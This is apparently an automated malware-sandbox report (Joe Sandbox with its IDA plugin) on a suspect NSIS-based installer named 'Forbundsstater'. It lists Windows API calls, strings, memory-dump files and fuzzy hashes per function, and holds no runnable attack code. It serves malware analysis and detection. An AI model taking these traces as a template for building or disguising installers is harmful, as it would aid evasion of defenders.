GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B06
GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B13
RegisterClassW.USER32(00428180), ref: 00403B1C
DialogBoxParamW.USER32(?,00000000,00403C55,00000000), ref: 00403B3B

Strings

RichEdit20W, xrefs: 00403AFE, 00403B04
RichEd20, xrefs: 00403AE6
RichEdit, xrefs: 00403B0D
RichEd32, xrefs: 00403AF1
_Nb, xrefs: 00403A36, 00403A9E
Control Panel\Desktop\ResourceLocale, xrefs: 004038E6
.exe, xrefs: 004039C0
.DEFAULT\Control Panel\International, xrefs: 0040391E

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 914957316-1115850852
Opcode ID: 8e4e2db869f3f3991819afcb55c59cc8f3ae99e000e4feef3646a4c772ef4b1b
Instruction ID: 7b2c8f7aec5f024c70211f55c02b660a410cf4becd836ab4c66ac285f40ceed6
Opcode Fuzzy Hash: 8e4e2db869f3f3991819afcb55c59cc8f3ae99e000e4feef3646a4c772ef4b1b
Instruction Fuzzy Hash: 5A61A470644201BAE320AF669C46F3B3A6CEB44749F40457FF941B62E2DB7C6902CA6D

Function 004042CA Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404368
GetDlgItem.USER32(?,000003E8), ref: 0040437C
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404399
GetSysColor.USER32(?), ref: 004043AA
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043B8
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C6
lstrlenW.KERNEL32(?), ref: 004043CB
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043D8
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043ED
GetDlgItem.USER32(?,0000040A), ref: 00404446
SendMessageW.USER32(00000000), ref: 0040444D
GetDlgItem.USER32(?,000003E8), ref: 00404478
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BB
LoadCursorW.USER32(00000000,00007F02), ref: 004044C9
SetCursor.USER32(00000000), ref: 004044CC
ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E1
LoadCursorW.USER32(00000000,00007F00), ref: 004044ED
SetCursor.USER32(00000000), ref: 004044F0
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040451F
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404531

Strings

open, xrefs: 004044D9
AB@, xrefs: 004044D6
N, xrefs: 00404466

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: AB@$N$open
API String ID: 3615053054-4108209771
Opcode ID: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
Instruction ID: a1eca56f6606bae04d2d34ddc617297d88c2ed2d28d9e68ba70837b4d7182fad
Opcode Fuzzy Hash: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
Instruction Fuzzy Hash: 657160F1A00209BFDB109F64DD85A6A7B69FB84755F00803AF705BA2D0C778AD51CFA9

Function 00405C06 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 136stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00425D70,NUL), ref: 00405C16
CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAA,?,?,00000001,00405922,?,00000000,000000F1,?), ref: 00405C3A
GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C43

Part of subcall function 00405AB9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
Part of subcall function 00405AB9: lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB

GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C60
wsprintfA.USER32 ref: 00405C7E
GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CB9
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CC8
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D00
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D56
WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D68
GlobalFree.KERNEL32(00000000), ref: 00405D6F
CloseHandle.KERNEL32(00000000), ref: 00405D76

Part of subcall function 00405B54: GetFileAttributesW.KERNEL32(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
Part of subcall function 00405B54: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A

Strings

%ls=%ls, xrefs: 00405C74
NUL, xrefs: 00405C10
[Rename], xrefs: 00405CE8, 00405CFA
p]B, xrefs: 00405C0B
peB, xrefs: 00405C55

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
String ID: %ls=%ls$NUL$[Rename]$p]B$peB
API String ID: 1265525490-3322868524
Opcode ID: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
Instruction ID: 0cb0380f10309b38a88638d348484b434b9e263fedf19fa463d2a85e12a62083
Opcode Fuzzy Hash: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
Instruction Fuzzy Hash: 09410571604B197FD2206B716C4DF6B3A6CEF45714F14413BBA01B62D2E638AC018E7D

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5

Function 004045C8 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 269stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404617
SetWindowTextW.USER32(00000000,?), ref: 00404641
SHBrowseForFolderW.SHELL32(?), ref: 004046F2
CoTaskMemFree.OLE32(00000000), ref: 004046FD
lstrcmpiW.KERNEL32(00427180,004226D0,00000000,?,?), ref: 0040472F
lstrcatW.KERNEL32(?,00427180), ref: 0040473B
SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474D

Part of subcall function 004056A8: GetDlgItemTextW.USER32(?,?,00000400,00404784), ref: 004056BB

Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403330,00436800,75923420,00403510), ref: 004061DF
Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
Part of subcall function 0040617C: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403330,00436800,75923420,00403510), ref: 004061F3
Part of subcall function 0040617C: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403330,00436800,75923420,00403510), ref: 00406206

GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 0040480E
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404829
SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048AF

Strings

A, xrefs: 004046EB

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A
API String ID: 2246997448-3554254475
Opcode ID: 9279281f82fbc7aa84ca95c74a32d54f8e3848aa2d1259afc6b0fcaac2342789
Instruction ID: c4517917acc678d55e137743079e569baa2315114eae4e5bd7326678801c6655
Opcode Fuzzy Hash: 9279281f82fbc7aa84ca95c74a32d54f8e3848aa2d1259afc6b0fcaac2342789
Instruction Fuzzy Hash: B69171B1900219EBDB11AFA1CC85AAF77B8EF85314F10843BF611B72D1D77C9A418B69

Function 00402DBA Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 203memoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402DCE
GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEA

Part of subcall function 00405B54: GetFileAttributesW.KERNEL32(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
Part of subcall function 00405B54: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A

GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E33
GlobalAlloc.KERNEL32(00000040,00409230), ref: 00402F7A

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403011
Error launching installer, xrefs: 00402E0A
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC3
Null, xrefs: 00402EB3
soft, xrefs: 00402EAA
Inst, xrefs: 00402EA1

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-787788815
Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
Instruction ID: 1f6ec37bde34587697a274125597031aed9c17e441137146a4e3b0792cc80405
Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
Instruction Fuzzy Hash: 3761F431940205ABDB20EF65DD89AAE3BB8AB04355F20417BF600B32D1D7B89E41DB9C

Function 00405F0A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 207stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,004216B0,?,004051C9,004216B0,00000000,00000000,00000000), ref: 00405FCD
GetSystemDirectoryW.KERNEL32(00427180,00000400), ref: 0040604B
GetWindowsDirectoryW.KERNEL32(00427180,00000400), ref: 0040605E
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609A
SHGetPathFromIDListW.SHELL32(?,00427180), ref: 004060A8
CoTaskMemFree.OLE32(?), ref: 004060B3
lstrcatW.KERNEL32(00427180,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D7
lstrlenW.KERNEL32(00427180,00000000,004216B0,?,004051C9,004216B0,00000000,00000000,00000000), ref: 00406131

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406019
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004060D1

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-730719616
Opcode ID: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
Instruction ID: 384f9b18ecc494a8ae61019a25258fdef34cde8ff9634092dda9820a5ebc2bca
Opcode Fuzzy Hash: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
Instruction Fuzzy Hash: 51610331A40505ABDB209F25CC44AAF37B5EF04314F51813BE956BB2E1D73D8AA2CB5E

Function 00404194 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004041B1
GetSysColor.USER32(00000000), ref: 004041CD
SetTextColor.GDI32(?,00000000), ref: 004041D9
SetBkMode.GDI32(?,?), ref: 004041E5
GetSysColor.USER32(?), ref: 004041F8
SetBkColor.GDI32(?,?), ref: 00404208
DeleteObject.GDI32(?), ref: 00404222
CreateBrushIndirect.GDI32(?), ref: 0040422C

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
Instruction ID: 87ec7ba1b4d1524bc80d11c5e2deb64ad1684491122c805edd444a6dd702efce
Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
Instruction Fuzzy Hash: 8521C6B1904744ABC7219F68DD08B4B7BF8AF40714F048A6DF996E22E0C738E944CB25

Function 00402571 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004025D9
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402614
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402637
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264D

Part of subcall function 00405BD7: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330A,00409230,00409230,004031FC,00413E78,00004000,?,00000000,?), ref: 00405BEB

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

Strings

9, xrefs: 004025BC

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: File$ByteCharMultiReadWide$Pointerwsprintf
String ID: 9
API String ID: 1149667376-2366072709
Opcode ID: 4b1c8a58dd33f7fe7e15ef8117ed1000f91cb8bfb35d653e6135ad7849d4d288
Instruction ID: b7948383e8f2d929eee7054b26862d8c15f429c1db02a3f5617992bcc001f061
Opcode Fuzzy Hash: 4b1c8a58dd33f7fe7e15ef8117ed1000f91cb8bfb35d653e6135ad7849d4d288
Instruction Fuzzy Hash: CE51ECB1D00219AADF24DFA4DE88AAEB779FF04304F50443BE501B62D0DB759E41CB69

Function 004027B3 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
GlobalFree.KERNEL32(00000000), ref: 00402875
CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
Instruction ID: d8d6ca7fed8381a62db75c1a7eb0a932fa2c1c5e4fe23f3949340a0d5ba681c8
Opcode Fuzzy Hash: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
Instruction Fuzzy Hash: 4031A072C04118BBDF10AFA5CE49DAF7E79EF09364F24023AF510762E0C6795E418BA9

Function 00405192 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
lstrcatW.KERNEL32(004216B0,00402D92), ref: 004051ED
SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
Instruction ID: 4e820289f32981fa80bdc57a8535783694e00142cb9a6ac2a8905b2d060becfb
Opcode Fuzzy Hash: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
Instruction Fuzzy Hash: 9D219D31D00518BACB21AF95DD84ADFBFB8EF44350F14807AF904B62A0C7794A41DFA8

Function 00402D18 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000), ref: 00402D33
GetTickCount.KERNEL32 ref: 00402D51
wsprintfW.USER32 ref: 00402D7F

Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402DA3
ShowWindow.USER32(00000000,00000005), ref: 00402DB1

Part of subcall function 00402CFC: MulDiv.KERNEL32(?,00000064,?), ref: 00402D11

Strings

... %d%%, xrefs: 00402D79

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 201e492ae77eb6b4c8df967ba73cc99fc00f9962e74671e1787f0dc67121c729
Instruction ID: 06dbfd79dbb9e8c2a0b606a1608badac8d0e42e3594422c28149bacc2d6aa5cf
Opcode Fuzzy Hash: 201e492ae77eb6b4c8df967ba73cc99fc00f9962e74671e1787f0dc67121c729
Instruction Fuzzy Hash: AD016131945225EBD762AB60AE4DAEB7B68EF01700F14407BF845B11E1C7FC9D41CA9E

Function 00404A5C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A77
GetMessagePos.USER32 ref: 00404A7F
ScreenToClient.USER32(?,?), ref: 00404A99
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAB
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD1

Strings

f, xrefs: 00404AAD

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
Instruction ID: 7a49535742b5819285e47484f8d523d0bdd0b2e8bbf2cce5393fd09457f71794
Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
Instruction Fuzzy Hash: 0C014C71E40219BADB00DBA4DD85BFEBBBCAB54711F10412ABB11B61C0D6B4AA018BA5

Function 00402C7D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9B
wsprintfW.USER32 ref: 00402CCF
SetWindowTextW.USER32(?,?), ref: 00402CDF
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF1

Strings

verifying installer: %d%%, xrefs: 00402CC4
unpacking data: %d%%, xrefs: 00402CBD, 00402CCD

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
